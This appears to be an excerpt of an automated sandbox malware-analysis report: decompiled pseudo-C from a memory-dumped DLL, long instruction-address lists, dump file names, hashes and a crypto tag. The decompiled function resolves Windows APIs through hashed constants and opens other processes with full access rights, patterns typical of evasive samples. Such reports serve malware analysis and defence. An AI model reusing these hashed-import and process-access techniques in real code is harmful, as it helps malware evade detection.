							E7332218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E7331F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E7331F6F0( &_v532);
				E7331B680( &_v492);
				E7331F6F0( &_v508);
				return 0;
			}

0x73319144
0x73319148
0x7331914e
0x73319150
0x73319161
0x73319164
0x7331916b
0x73319174
0x7331917b
0x7331917f
0x73319188
0x7331918f
0x73319197
0x7331919c
0x733191ab
0x733191af
0x733191c4
0x733191da
0x733191e8
0x733191e9
0x733191ea
0x733191eb
0x733191ec
0x733191f3
0x733191f7
0x73319201
0x73319216
0x7331922c
0x7331923a
0x7331923b
0x7331923c
0x7331923d
0x7331923e
0x73319245
0x73319249
0x73319253
0x73319268
0x7331927e
0x7331928c
0x7331928d
0x7331928e
0x7331928f
0x73319290
0x73319297
0x7331929b
0x733192a5
0x733192ba
0x733192d0
0x733192de
0x733192df
0x733192e0
0x733192e1
0x733192e2
0x733192e9
0x733192ed
0x733192f7
0x7331930c
0x73319322
0x73319330
0x73319331
0x73319332
0x73319333
0x73319334
0x7331933b
0x7331933f
0x73319349
0x7331935e
0x73319374
0x73319382
0x73319383
0x73319384
0x73319385
0x7331938e
0x73319390
0x7331939b
0x733193a0
0x733193a5
0x733193b1
0x733193b6
0x733193bb
0x733193c7
0x733193cc
0x733193d1
0x733193dd
0x733193e2
0x733193e7
0x733193f3
0x733193f8
0x733193fd
0x73319409
0x7331940e
0x7331941a
0x73319420
0x73319430
0x73319435
0x7331943e
0x73319447
0x7331947e
0x73319487
0x7331948c
0x73319497
0x733194a1
0x733194a7
0x733194b9
0x733194cf
0x733194dd
0x733194de
0x733194df
0x733194e0
0x733194e1
0x733194e8
0x733194f2
0x733194f8
0x7331950a
0x73319520
0x7331952e
0x7331952f
0x73319530
0x73319531
0x73319532
0x73319539
0x73319543
0x73319549
0x7331955b
0x73319571
0x7331957f
0x73319580
0x73319581
0x73319582
0x73319583
0x73319586
0x73319589
0x7331959f
0x733195a4
0x733195a8
0x733195b3
0x733195b8
0x733195bd
0x733195c9
0x733195ce
0x733195d3
0x733195e7
0x733195ef
0x733195f6
0x73319606
0x73319614
0x73319620
0x73319622
0x73319629
0x7331963c
0x73319643
0x7331965c
0x7331966a
0x73319681
0x7331968f
0x73319694
0x733196a0
0x733196ad
0x733196b4
0x733196c9
0x733196ce
0x733196d5
0x733196dc
0x733196e3
0x7331a1d7
0x7331a1de
0x7331a1ea
0x7331a1f6
0x00000000
0x7331a1f6
0x733196f0
0x733196f7
0x00000000
0x00000000
0x7331970c
0x73319711
0x73319722
0x73319727
0x73319733
0x7331973a
0x73319740
0x73319745
0x73319748
0x7331974e
0x7331975c
0x7331975d
0x73319761
0x73319765
0x73319769
0x7331977e
0x73319789
0x7331978a
0x7331978e
0x73319792
0x73319796
0x733197a0
0x733197b6
0x733197b7
0x733197bb
0x733197bf
0x733197c3
0x733197df
0x733197f5
0x733197f5
0x733197fb
0x733197fd
0x73319800
0x73319805
0x7331980c
0x73319810
0x73319814
0x7331981a
0x73319820
0x73319832
0x73319848
0x73319856
0x73319857
0x73319858
0x73319859
0x7331985a
0x73319861
0x7331986b
0x73319871
0x73319883
0x73319899
0x733198a7
0x733198a8
0x733198a9
0x733198aa
0x733198ab
0x733198b2
0x733198bc
0x733198c2
0x733198d4
0x733198ea
0x733198f8
0x733198f9
0x733198fa
0x733198fb
0x733198fc
0x73319903
0x7331990d
0x73319913
0x73319925
0x7331993b
0x73319949
0x7331994a
0x7331994b
0x7331994c
0x7331994d
0x73319950
0x73319954
0x73319958
0x7331995e
0x73319964
0x73319976
0x7331998c
0x7331999a
0x7331999b
0x7331999c
0x7331999d
0x7331999e
0x733199a5
0x733199af
0x733199b5
0x733199c7
0x733199dd
0x733199eb
0x733199ec
0x733199ed
0x733199ee
0x733199ef
0x733199f6
0x73319a00
0x73319a06
0x73319a18
0x73319a2e
0x73319a3c
0x73319a3d
0x73319a3e
0x73319a3f
0x73319a40
0x73319a47
0x73319a51
0x73319a57
0x73319a69
0x73319a7f
0x73319a8d
0x73319a8e
0x73319a8f
0x73319a90
0x73319a96
0x73319a99
0x73319a9b
0x73319aa6
0x73319aab
0x73319ab0
0x73319abf
0x73319ac4
0x73319ac9
0x73319ad8
0x73319add
0x73319ae2
0x73319af1
0x73319af6
0x73319afb
0x73319b0a
0x73319b0f
0x73319b14
0x73319b23
0x73319b28
0x73319b2d
0x73319b3c
0x73319b41
0x73319b46
0x73319b55
0x73319b5a
0x73319b63
0x73319b6b
0x73319b70
0x73319b77
0x73319b84
0x73319b86
0x7331a1bf
0x7331a1c6
0x7331a1d2
0x00000000
0x7331a1d2
0x73319b8c
0x73319b95
0x73319b98
0x73319db0
0x73319db0
0x73319dbb
0x73319ddf
0x73319de1
0x00000000
0x00000000
0x73319de7
0x73319dec
0x73319df3
0x73319e00
0x73319e02
0x00000000
0x00000000
0x73319e08
0x73319e11
0x73319e12
0x73319e14
0x73319e17
0x00000000
0x00000000
0x00000000
0x73319e19
0x73319e1e
0x73319e29
0x73319e29
0x73319e2e
0x73319e35
0x73319e3c
0x73319e43
0x73319e48
0x73319e53
0x73319e55
0x00000000
0x00000000
0x73319e5b
0x73319e60
0x73319e67
0x73319e74
0x73319e76
0x00000000
0x00000000
0x73319e7c
0x73319e85
0x73319e86
0x73319e88
0x73319e8b
0x00000000
0x00000000
0x00000000
0x73319e8d
0x73319e9b
0x73319ea3
0x73319eae
0x73319eb5
0x73319ebc
0x73319ec0
0x73319ec4
0x73319eca
0x73319ed5
0x73319ee0
0x73319ee5
0x73319ee7
0x00000000
0x00000000
0x73319eed
0x73319ef8
0x73319f0e
0x73319f1e
0x73319f20
0x00000000
0x00000000
0x73319f26
0x73319f2b
0x73319f32
0x73319f3f
0x73319f41
0x00000000
0x00000000
0x73319f47
0x73319f50
0x73319f51
0x73319f53
0x73319f56
0x00000000
0x00000000
0x00000000
0x73319f58
0x73319f5d
0x73319f68
0x73319f71
0x73319f84
0x73319f85
0x73319f8c
0x73319f93
0x73319f9a
0x73319f9b
0x73319fa6
0x73319fa8
0x00000000
0x00000000
0x73319fae
0x73319fb3
0x73319fba
0x73319fc7
0x73319fc9
0x00000000
0x00000000
0x73319fcf
0x73319fd8
0x73319fd9
0x73319fdb
0x73319fde
0x00000000
0x00000000
0x00000000
0x73319fe0
0x7331a000
0x7331a005
0x7331a007
0x00000000
0x00000000
0x7331a016
0x7331a022
0x7331a02d
0x7331a039
0x7331a043
0x7331a043
0x7331a046
0x7331a04e
0x7331a05a
0x7331a069
0x7331a071
0x7331a074
0x7331a07d
0x7331a08d
0x7331a092
0x7331a09d
0x7331a0a6
0x7331a0b9
0x7331a0ba
0x7331a0c1
0x7331a0c8
0x7331a0cf
0x7331a0d0
0x7331a0db
0x7331a0dd
0x00000000
0x00000000
0x7331a0e3
0x7331a0e8
0x7331a0ef
0x7331a0fa
0x7331a0fc
0x7331a1b3
0x7331a1ba
0x00000000
0x7331a1ba
0x7331a102
0x7331a10b
0x7331a10c
0x7331a10e
0x7331a111
0x00000000
0x00000000
0x00000000
0x7331a113
0x7331a118
0x7331a123
0x7331a123
0x7331a126
0x7331a12a
0x7331a134
0x7331a138
0x7331a13f
0x7331a14a
0x7331a14e
0x7331a158
0x7331a162
0x7331a166
0x7331a16c
0x7331a177
0x7331a179
0x00000000
0x00000000
0x7331a183
0x7331a188
0x7331a18f
0x7331a19a
0x7331a19c
0x00000000
0x00000000
0x7331a19e
0x7331a1a7
0x7331a1a8
0x7331a1aa
0x7331a1ad
0x00000000
0x00000000
0x00000000
0x7331a1ad
0x7331a200
0x7331a202
0x7331a209
0x7331a20e
0x7331a211
0x7331a21f
0x7331a230
0x7331a23c
0x7331a248
0x7331a254
0x7331a260
0x7331a26c
0x7331a275
0x7331a27e
0x7331a287
0x7331a28e
0x00000000
0x7331a290
0x73319b9e
0x73319ba9
0x73319bb2
0x73319bb7
0x73319bc3
0x73319bc4
0x73319bd4
0x73319be2
0x73319bf5
0x73319c01
0x73319c0d
0x73319c19
0x73319c20
0x73319c23
0x73319c2e
0x73319c30
0x73319cdb
0x73319cdb
0x73319cde
0x73319ce7
0x73319ceb
0x73319cef
0x73319cf5
0x73319cf9
0x73319d05
0x73319d0f
0x73319d13
0x73319d19
0x73319d1f
0x73319d24
0x73319d26
0x73319d3e
0x73319d4a
0x73319d5e
0x73319d63
0x73319d6c
0x73319d6f
0x00000000
0x00000000
0x73319d75
0x73319d7a
0x73319d81
0x73319d8e
0x73319d90
0x00000000
0x00000000
0x00000000
0x73319d90
0x73319d28
0x73319d2f
0x00000000
0x73319d2f
0x73319c36
0x73319c41
0x73319c4f
0x73319c54
0x73319c56
0x73319c59
0x73319c62
0x73319c66
0x73319c6e
0x73319c74
0x73319c78
0x73319c7e
0x73319c8b
0x73319c8f
0x73319c93
0x73319c9b
0x73319ca1
0x73319ca6
0x73319ca8
0x00000000
0x00000000
0x73319cac
0x73319cad
0x73319cb2
0x73319cbc
0x73319cc3
0x73319cce
0x73319cd5
0x00000000
0x00000000
0x00000000
0x73319cd5
0x00000000
0x73319d96
0x73319d96
0x73319d9f
0x73319da0
0x73319da2
0x73319da2
0x00000000
0x73319dab
0x73319449
0x7331944d
0x73319456
0x7331945f
0x00000000

Strings

$EA, xrefs: 733191E1

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 77a64543d02d5ac32d4240be958bd5cbd018dfd07456df0122faebad25bc2167
Instruction ID: ac389226b1f39620c6160821a9b067e2e518ab06173726be96deaef7a4491a69
Opcode Fuzzy Hash: 77a64543d02d5ac32d4240be958bd5cbd018dfd07456df0122faebad25bc2167
Instruction Fuzzy Hash: D5A29171814B429FE339DF24C840BDEB7F4AF95300F008A2DE5999B1A1EF70A956CB52

Uniqueness

Uniqueness Score: -1.00%

Function 7331A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E7331A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E7331B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E7331F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E7331F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E7332218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E7331F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E7331F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E7331F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x7332b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E73322F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E7331F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E7331F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E7331B680(_t439 + 0x34);
											E7331B680(_t439 + 8);
											goto L65;
										}
										L62:
										E7331B680(_t439 + 0x34);
										E7331B680(_t439 + 8);
										goto L63;
									}
									_t392 = E7331F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E7331CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E7331C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E7331F8C4(_t439 + 0x14, E7331F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E7331F558(_t439 + 0x14, E7331F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E73322F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E7331F8C4(_t439 + 0x40, E7331F568(_t439 + 0x3c) + 4);
											 *(E7331F558(_t439 + 0x40, E7331F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E7331CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E7331F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E7331F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E7331AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E7331CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E7331F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E7331F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E7331F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E7331F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E7331F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E7332382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7331F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E7331F8C4( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E7331F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E7331F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E7331F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E7331F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E7332382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7331F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E7331F8C4( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E7331F8C4( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E7331F558( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E7331F8C4( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 4);
								 *(E7331F558( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E7331F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E73322F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7331F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E7331F8C4( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E7331F558( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E7331F558(_t439 + 0x28,  *(_t439 + 0x70));
										E7331F8C4( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 4);
										 *(E7331F558( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7331F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E7331F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E7331F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E7331F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E7331F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E7331F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E7332382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7331F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E7331F8C4( *((intOrPtr*)(_t439 + 4)), E7331F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E73322F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E7331F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E7331F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E7331F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E7331F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E7331F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E7332382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7331F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E7331F8C4( *((intOrPtr*)(_t439 + 8)), E7331F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7331F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x7331a5ae
0x7331a5b0
0x7331a5bb
0x7331a5c1
0x7331a5c5
0x7331a5ca
0x7331a5d0
0x7331a5e0
0x00000000
0x7331a5e2
0x7331a5e2
0x7331a5ed
0x7331a5ed
0x7331ab6b
0x7331ab6d
0x7331ab6e
0x7331abad
0x7331abb1
0x7331abbf
0x7331abcd
0x7331abcd
0x7331abb8
0x7331abd3
0x7331abd8
0x00000000
0x7331abd8
0x7331abbc
0x7331abbd
0x00000000
0x7331a5f7
0x7331a5f7
0x7331a5fb
0x7331a702
0x7331a702
0x7331a707
0x7331a818
0x7331a81c
0x7331a821
0x7331a825
0x7331a94f
0x7331a951
0x7331a955
0x7331a95e
0x7331a967
0x7331a96b
0x7331a974
0x7331a97b
0x7331a97c
0x7331a980
0x7331a984
0x7331a988
0x7331a98a
0x7331aaf4
0x7331aaf4
0x7331aafc
0x7331ab14
0x7331ab16
0x7331ab18
0x7331ab52
0x7331ab52
0x7331ab54
0x7331ab54
0x7331ab57
0x7331ab72
0x7331ab86
0x7331ab89
0x7331ab8e
0x7331ab99
0x7331ab9a
0x7331ab9d
0x7331ab9f
0x7331aba8
0x00000000
0x7331aba8
0x7331ab59
0x7331ab5d
0x7331ab66
0x00000000
0x7331ab66
0x7331ab29
0x7331ab39
0x7331ab3d
0x7331ab3d
0x7331ab40
0x7331ab43
0x7331ab46
0x7331ab4c
0x00000000
0x00000000
0x00000000
0x7331ab4e
0x7331a992
0x7331a992
0x7331a994
0x7331a998
0x7331a99d
0x7331a99f
0x7331a9a3
0x7331a9a6
0x7331a9ae
0x7331a9b0
0x00000000
0x00000000
0x7331a9c7
0x7331a9e2
0x7331a9e4
0x7331a9f7
0x7331a9f9
0x7331a9fb
0x7331aa16
0x7331aa16
0x7331aa1a
0x7331aa1c
0x00000000
0x00000000
0x7331aa1e
0x7331aa21
0x7331aa42
0x7331aa61
0x7331aa67
0x7331aa6a
0x7331aa6f
0x7331aa70
0x7331aa74
0x00000000
0x00000000
0x7331aa7c
0x7331aa7c
0x7331aa7e
0x7331aa8a
0x7331aa96
0x7331aaa0
0x7331aaa3
0x7331aaa6
0x7331aaaa
0x7331aab1
0x7331aab5
0x7331aab9
0x7331aaba
0x7331aabe
0x7331aac3
0x7331aac8
0x7331aacc
0x7331aad0
0x7331aad6
0x7331aadc
0x7331aae2
0x7331aae8
0x7331aaed
0x7331aaee
0x7331aaee
0x00000000
0x7331aa7e
0x00000000
0x7331aa21
0x7331a9ff
0x7331aa10
0x7331aa12
0x7331aa14
0x00000000
0x00000000
0x00000000
0x7331aa14
0x7331aa27
0x00000000
0x7331aa27
0x7331a82b
0x7331a82e
0x7331a830
0x00000000
0x00000000
0x7331a838
0x7331a838
0x7331a83a
0x7331a83a
0x7331a84b
0x7331a84d
0x7331a850
0x00000000
0x00000000
0x7331a946
0x7331a947
0x7331a949
0x00000000
0x00000000
0x00000000
0x7331a949
0x7331a856
0x7331a859
0x7331a863
0x7331a868
0x7331a86a
0x7331a870
0x7331a877
0x7331a87b
0x7331a880
0x7331a884
0x7331acbf
0x7331acd3
0x7331acf6
0x7331acfb
0x7331acfb
0x7331a89b
0x7331a8a0
0x7331a8a0
0x7331a8a0
0x7331a8a0
0x7331a8a6
0x7331a8ab
0x7331a8ad
0x7331a8b2
0x7331a8b9
0x7331a8be
0x7331a8c0
0x7331ac7d
0x7331ac8e
0x7331aca8
0x7331acad
0x7331acad
0x7331a8d6
0x7331a8db
0x7331a8db
0x7331a8db
0x7331a8db
0x7331a8ef
0x7331a90d
0x7331a912
0x7331a922
0x7331a93f
0x7331a941
0x7331a941
0x00000000
0x7331a859
0x7331a70f
0x7331a70f
0x7331a711
0x7331a718
0x7331a726
0x7331a728
0x7331a72b
0x7331a732
0x7331a734
0x7331a765
0x7331a774
0x7331a776
0x7331a778
0x7331a796
0x7331a798
0x7331a79a
0x7331a7ad
0x7331a7cc
0x7331a7d2
0x7331a7d5
0x7331a7ec
0x7331a808
0x7331a80a
0x7331a80a
0x7331a80a
0x7331a80a
0x7331a79a
0x00000000
0x7331a778
0x7331a738
0x7331a738
0x7331a73a
0x7331a74b
0x7331a74d
0x7331a74f
0x00000000
0x00000000
0x7331a75b
0x7331a75c
0x7331a763
0x00000000
0x00000000
0x00000000
0x7331a763
0x7331a751
0x7331a754
0x00000000
0x00000000
0x7331a80d
0x7331a80d
0x7331a80e
0x7331a80e
0x00000000
0x7331a601
0x7331a603
0x7331a603
0x7331a605
0x7331a60c
0x7331a61a
0x7331a61c
0x7331a620
0x7331a624
